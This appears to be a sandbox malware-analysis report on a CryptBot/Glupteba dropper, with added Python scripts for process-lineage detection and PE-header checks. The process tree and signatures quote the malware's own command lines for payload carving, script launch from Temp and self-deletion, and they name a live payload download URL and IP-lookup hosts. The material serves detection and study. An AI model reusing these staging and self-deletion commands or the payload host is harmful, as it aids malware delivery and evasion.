
Windows Analysis Report 7yyqdBJVGf.exe

Overview

General Information

Sample Name: 7yyqdBJVGf.exe
Analysis ID: 492301
MD5: 267667a4bbfdfcf20c407c2b191fd0ed
SHA1: 73870de4caa2eaaf162c81c34740527e12b8467c
SHA256: c3b9a8dde21bf3c1bb09426a261c77eb4b59cb2f36ac82e5b8f6b4a4d3565b5b
Tags: CryptBot, exe

Detection

Detected families: Cryptbot, Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Cryptbot
Detected unpacking (overwrites its own PE header)
Yara detected Glupteba
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Submitted sample is a known malware sample
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: WScript or CScript Dropper
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Obfuscated command line found
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Process Tree

  • System is w10x64
  • 7yyqdBJVGf.exe (PID: 2916 cmdline: 'C:\Users\user\Desktop\7yyqdBJVGf.exe' MD5: 267667A4BBFDFCF20C407C2B191FD0ED)
    • File.exe (PID: 2116 cmdline: 'C:\Users\user~1\AppData\Local\Temp\File.exe' MD5: 303F5DE158A079AAE941319BE50D1F2D)
      • wheezy.exe (PID: 1708 cmdline: C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe MD5: 20B1305BCB80B32661D564CE22DF4C24)
        • dllhost.exe (PID: 4712 cmdline: dllhost.exe MD5: 70E2034A1C3D0ECCB73F57E33D4BFFA0)
        • cmd.exe (PID: 5112 cmdline: cmd /c cmd < Quegli.wav MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5456 cmdline: cmd MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • findstr.exe (PID: 5528 cmdline: findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
            • Bisogna.exe.com (PID: 5296 cmdline: Bisogna.exe.com l MD5: C56B5F0201A3B3DE53E561FE76912BFD)
              • Bisogna.exe.com (PID: 4884 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l MD5: C56B5F0201A3B3DE53E561FE76912BFD)
                • wscript.exe (PID: 6388 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
            • PING.EXE (PID: 2860 cmdline: ping 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
      • parted.exe (PID: 160 cmdline: C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe MD5: C92045F9553387FE8AB90B2B6A24E805)
        • IntelRapid.exe (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe MD5: C92045F9553387FE8AB90B2B6A24E805)
    • cmd.exe (PID: 5072 cmdline: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 3888 cmdline: timeout 4 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • IntelRapid.exe (PID: 6180 cmdline: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe MD5: C92045F9553387FE8AB90B2B6A24E805)
  • rundll32.exe (PID: 6264 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\' MD5: 73C519F050C20580F8A62C849D49215A)
  • IntelRapid.exe (PID: 6464 cmdline: 'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe' MD5: C92045F9553387FE8AB90B2B6A24E805)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security
00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security
00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security
Process Memory Space: 7yyqdBJVGf.exe PID: 2916 | JoeSecurity_Glupteba_1 | Yara detected Glupteba | Joe Security
Process Memory Space: 7yyqdBJVGf.exe PID: 2916 | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
24.2.Bisogna.exe.com.39857c0.3.raw.unpack | JoeSecurity_GenericDownloader_3 | Yara detected Generic Downloader | Joe Security
24.2.Bisogna.exe.com.395ebb0.4.raw.unpack | JoeSecurity_GenericDownloader_3 | Yara detected Generic Downloader | Joe Security
24.2.Bisogna.exe.com.f90000.1.unpack | JoeSecurity_GenericDownloader_3 | Yara detected Generic Downloader | Joe Security
0.2.7yyqdBJVGf.exe.3080e50.3.unpack | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security
0.3.7yyqdBJVGf.exe.30d0000.0.unpack | JoeSecurity_Cryptbot | Yara detected Cryptbot | Joe Security
(5 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started
Author: Florian Roth, Max Altgelt
Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs', CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l, ParentImage: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com, ParentProcessId: 4884, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs', ProcessId: 6388
Sigma detected: WScript or CScript Dropper
Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community
Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs', CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l, ParentImage: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com, ParentProcessId: 4884, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs', ProcessId: 6388
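The process tree and the two Sigma hits above describe one chain: an NSIS dropper (File.exe) extracts a wextract stub (wheezy.exe), which runs `cmd < Quegli.wav`, uses `findstr /V /R '^marker$'` to strip a header line from a decoy and carve out Bisogna.exe.com inside an IXP000.TMP folder, delays with `ping 127.0.0.1`, launches a .vbs from Temp through wscript.exe, wipes the staging folder with `rundll32 advpack.dll,DelNodeRunDLL32`, and finally deletes the original sample with `timeout 4 & del`. The script below is an added example, not Joe Sandbox code and not the Sigma rules the report cites: it reimplements those checks as process-lineage detections over events constructed from the tree. The event schema (pid, ppid, image, cmdline) and the rule names are assumptions chosen for illustration.

```python
"""Process-lineage detections for the chain in the process tree above.
Added example (not Joe Sandbox code, not the cited Sigma rules). Events are
constructed from the tree on this page; the event schema (pid, ppid, image,
cmdline) and the rule names are assumptions chosen for illustration."""
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Constructed from the report's process tree (PIDs and command lines as shown there).
EVENTS = [
    ProcEvent(2916, 1, r"C:\Users\user\Desktop\7yyqdBJVGf.exe", r"'C:\Users\user\Desktop\7yyqdBJVGf.exe'"),
    ProcEvent(2116, 2916, r"C:\Users\user\AppData\Local\Temp\File.exe", r"'C:\Users\user~1\AppData\Local\Temp\File.exe'"),
    ProcEvent(1708, 2116, r"C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe", r"C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe"),
    ProcEvent(5112, 1708, r"C:\Windows\SysWOW64\cmd.exe", "cmd /c cmd < Quegli.wav"),
    ProcEvent(5456, 5112, r"C:\Windows\SysWOW64\cmd.exe", "cmd"),
    ProcEvent(5528, 5456, r"C:\Windows\SysWOW64\findstr.exe",
              "findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav"),
    ProcEvent(5296, 5456, r"C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com", "Bisogna.exe.com l"),
    ProcEvent(4884, 5296, r"C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com",
              r"C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l"),
    ProcEvent(6388, 4884, r"C:\Windows\SysWOW64\wscript.exe",
              r"'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'"),
    ProcEvent(2860, 5456, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1"),
    ProcEvent(5072, 2916, r"C:\Windows\System32\cmd.exe",
              r"'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'"),
    ProcEvent(6264, 1, r"C:\Windows\System32\rundll32.exe",
              r"'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'"),
]


def _exe(path):
    return path.rsplit("\\", 1)[-1].lower()


def findstr_carve(ev, parent):
    # findstr /V /R "^marker$" decoy: prints every line that does NOT match the
    # marker, i.e. strips the decoy's header line and emits the embedded payload.
    c = ev.cmdline.lower()
    return (_exe(ev.image) == "findstr.exe" and " /v" in c and " /r" in c
            and re.search(r"""['"]\^[^'"]+\$['"]""", ev.cmdline) is not None)


def cmd_stdin_from_file(ev, parent):
    # "cmd < file": the shell reads commands from a file whose extension (.wav) hides a script.
    if _exe(ev.image) != "cmd.exe":
        return False
    m = re.search(r"<\s*(\S+)", ev.cmdline)
    return m is not None and not m.group(1).lower().endswith((".bat", ".cmd"))


def script_from_temp(ev, parent):
    # Sigma "Suspicious Script Execution From Temp Folder" / "WScript or CScript Dropper".
    return (_exe(ev.image) in ("wscript.exe", "cscript.exe")
            and re.search(r"\\temp\\[^'\" ]+\.(vbs|vbe|js|jse|wsf|hta)\b", ev.cmdline, re.I) is not None)


def wextract_double_extension(ev, parent):
    # *.exe.com started from an IXP000.TMP folder, the extraction dir of the
    # IExpress/wextract self-extractor (wextract.pdb is present in wheezy.exe).
    return re.search(r"\\IXP\d{3}\.TMP\\[^\\]+\.exe\.com$", ev.image, re.I) is not None


def loopback_ping_delay(ev, parent):
    # ping 127.0.0.1 spawned by cmd: a delay with no Sleep() call to hook.
    return (_exe(ev.image) == "ping.exe" and "127.0.0.1" in ev.cmdline
            and parent is not None and _exe(parent.image) == "cmd.exe")


def advpack_delnode(ev, parent):
    # rundll32 advpack.dll,DelNodeRunDLL32 <dir>: recursive delete via a signed Microsoft DLL.
    return (_exe(ev.image) == "rundll32.exe"
            and re.search(r"advpack\.dll\s*,\s*DelNodeRunDLL32", ev.cmdline, re.I) is not None)


def self_delete(ev, parent):
    # cmd /c ... timeout N & del /f /q "<parent image>": the dropper removes its own file.
    if _exe(ev.image) != "cmd.exe" or parent is None:
        return False
    m = re.search(r"""\bdel\b[^&]*?['"]?([A-Za-z]:\\[^'"&]+\.exe)""", ev.cmdline, re.I)
    return m is not None and m.group(1).lower() == parent.image.lower()


RULES = {f.__name__: f for f in (findstr_carve, cmd_stdin_from_file, script_from_temp,
                                  wextract_double_extension, loopback_ping_delay,
                                  advpack_delnode, self_delete)}


def detect(events):
    """Return (pid, rule_name) pairs for every rule that fires."""
    by_pid = {e.pid: e for e in events}
    return [(ev.pid, name) for ev in events
            for name, rule in RULES.items() if rule(ev, by_pid.get(ev.ppid))]


def lineage(events, pid):
    """Image basenames from the root of the tree down to pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_exe(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"{pid:>5}  {rule:<26}  {' > '.join(lineage(EVENTS, pid))}")
```

Each rule on its own is noisy (ping 127.0.0.1 and findstr /V are used by legitimate scripts); the value is in the lineage, so alert on a parent chain that passes through a Temp-resident binary and fires two or more of them.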

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://zukelx03.top/downfiles/lv.exe | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for submitted file
Source: 7yyqdBJVGf.exe | Virustotal: Detection: 52%
Source: 7yyqdBJVGf.exe | ReversingLabs: Detection: 48%
Multi AV Scanner detection for domain / URL
Source: http://zukelx03.top/downfiles/lv.exe | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\File.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe | ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe | ReversingLabs: Detection: 35%
Machine Learning detection for sample
Source: 7yyqdBJVGf.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe | Joe Sandbox ML: detected
Source: 13.0.wheezy.exe.4e0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 13.2.wheezy.exe.4e0000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | Code function: 0_2_00401220 GetFileAttributesW,CreateFileW,GetFileSizeEx,CloseHandle,CreateFileMappingW,MapViewOfFile,CloseHandle,CloseHandle,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe | Code function: 13_2_004E662D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | Unpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack
Source: 7yyqdBJVGf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: Binary string: wextract.pdb | source: wheezy.exe, wheezy.exe.10.dr
Source: Binary string: wextract.pdb0lbp | source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
Source: Binary string: C:\sojeli.pdb | source: 7yyqdBJVGf.exe
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! | source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb | source: IntelRapid.exe
Source: Binary string: acppage.pdb | source: acppage.dll.10.dr
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | Code function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | Code function: 0_2_0042B3BE FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\File.exe | Code function: 10_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\File.exe | Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe | Code function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
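Several signatures in this report are static PE-header facts (32-bit image, invalid checksum, sections with non-standard names, entry point location), and the 200 OK response captured in the Networking section below carries the raw header of the downloaded lv.exe: six sections named .text, .rdata, .data, .ndata, .rsrc and .reloc, a zero CheckSum and a 4,520,950-byte body. The .ndata section is the marker of an NSIS installer, which matches the nsis.sf.net string the report finds in File.exe. The script below is an added example, not Joe Sandbox code: it rebuilds that header with struct from the field values read off the hex dump (the transcription is an assumption; re-derive the values from your own capture before relying on them) and runs the same class of checks, plus the overlay size and an on-disk section-overlap check that a malformed or packed header trips.

```python
"""Static checks on the PE header returned in the 200 OK response captured in
the Networking section. Added example, not Joe Sandbox code. Field values are
transcribed from the hex dump on this page (assumed correct; re-derive from
your own capture)."""
import struct

# name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
SECTIONS = [
    (b".text",  0x728c,  0x1000,   0x7400, 0x400,  0x60000020),
    (b".rdata", 0x2b6e,  0x9000,   0x2c00, 0x7800, 0x40000040),
    (b".data",  0x72b9c, 0xc000,   0x200,  0xa400, 0xc0000040),
    (b".ndata", 0xe1000, 0x7f000,  0x0,    0x0,    0xc0000080),
    (b".rsrc",  0xef18,  0x160000, 0xf000, 0xa600, 0x40000040),
    (b".reloc", 0xfd6,   0x16f000, 0x1000, 0xb800, 0x42000040),
]
CONTENT_LENGTH = 4520950   # Content-Length of the captured response
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT"}


def build_header() -> bytes:
    """Rebuild the first 0x400 bytes (SizeOfHeaders) from the transcribed fields."""
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0xd0)).ljust(0xd0, b"\0")   # e_lfanew = 0xd0
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14c, len(SECTIONS), 0x4f47e2e4, 0, 0, 0xe0, 0x0102)
    opt = struct.pack("<HBB9I6H4I2H6I",
                      0x10b, 10, 0,                                      # PE32, linker 10.0
                      0x7400, 0x77a00, 0x4200, 0x38af, 0x1000, 0x9000,    # code/data sizes, AddressOfEntryPoint, bases
                      0x400000, 0x1000, 0x200,                            # ImageBase, section/file alignment
                      5, 0, 6, 0, 5, 0,                                   # OS / image / subsystem versions
                      0, 0x170000, 0x400, 0,                              # Win32Version, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0x8540,                                          # GUI subsystem, DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)          # stack/heap, LoaderFlags, NumberOfRvaAndSizes
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, 1 * 8, 0xac40, 0xb4)       # import table
    struct.pack_into("<II", dirs, 2 * 8, 0x160000, 0xef18)   # resource table
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in SECTIONS)
    return (dos + coff + opt + bytes(dirs) + secs).ljust(0x400, b"\0")


def parse_pe(buf: bytes) -> dict:
    e_lfanew, = struct.unpack_from("<I", buf, 0x3c)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", buf, opt)
    entry, = struct.unpack_from("<I", buf, opt + 16)      # AddressOfEntryPoint
    checksum, = struct.unpack_from("<I", buf, opt + 64)   # CheckSum
    sections = []
    for i in range(nsec):
        name, vs, va, rs, rp, _, _, _, _, ch = struct.unpack_from("<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vs, "va": va, "rsize": rs, "rptr": rp, "chars": ch})
    return {"machine": machine, "magic": magic, "timestamp": ts, "characteristics": chars,
            "entry": entry, "checksum": checksum, "sections": sections}


def nonstandard_sections(info):
    return [s["name"] for s in info["sections"] if s["name"] not in STANDARD_NAMES]


def entry_section(info):
    """Section containing AddressOfEntryPoint, or None (the report's
    'entry point lies outside standard sections' case)."""
    for s in info["sections"]:
        if s["va"] <= info["entry"] < s["va"] + max(s["vsize"], s["rsize"]):
            return s["name"]
    return None


def overlay_size(info, file_size):
    """Bytes past the last raw section; NSIS stores its archive there."""
    end = max((s["rptr"] + s["rsize"] for s in info["sections"] if s["rsize"]), default=0)
    return file_size - end


def raw_overlaps(info):
    """Section pairs whose on-disk ranges intersect (malformed or hand-edited header)."""
    secs = [s for s in info["sections"] if s["rsize"]]
    return [(a["name"], b["name"]) for i, a in enumerate(secs) for b in secs[i + 1:]
            if a["rptr"] < b["rptr"] + b["rsize"] and b["rptr"] < a["rptr"] + a["rsize"]]


def summarize(info, file_size):
    odd = nonstandard_sections(info)
    return {"is_pe32_x86": info["magic"] == 0x10b and info["machine"] == 0x14c,
            "checksum_zero": info["checksum"] == 0,     # no checksum written; stored-vs-computed tools call it invalid
            "nonstandard": odd,
            "nsis_marker": ".ndata" in odd,              # NSIS installers carry an .ndata section
            "entry_in": entry_section(info),
            "overlay_bytes": overlay_size(info, file_size),
            "raw_overlaps": raw_overlaps(info)}


if __name__ == "__main__":
    for k, v in summarize(parse_pe(build_header()), CONTENT_LENGTH).items():
        print(f"{k:<14} {v}")
```

On the transcribed values the header maps out to about 104 KB of sections followed by roughly 4.4 MB of overlay, which is where an NSIS installer keeps the compressed payload that File.exe later unpacks into the Temp\dislip directory.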

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe | Domain query: iplogger.org
Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 88.99.66.31 187
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com | DNS query: name: ip-api.com
Source: C:\Windows\SysWOW64\wscript.exe | DNS query: name: iplogger.org
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Yara detected Generic Downloader
Source: Yara match | File source: 24.2.Bisogna.exe.com.39857c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Bisogna.exe.com.395ebb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Bisogna.exe.com.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.Bisogna.exe.com.393bfa8.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 13:24:11 GMTServer: Apache/2.2.22 (@RELEASE@)Last-Modified: Tue, 28 Sep 2021 09:56:00 GMTETag: "380018-44fbf6-5cd0b38838d02"Accept-Ranges: bytesContent-Length: 4520950Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 17 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 18 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 
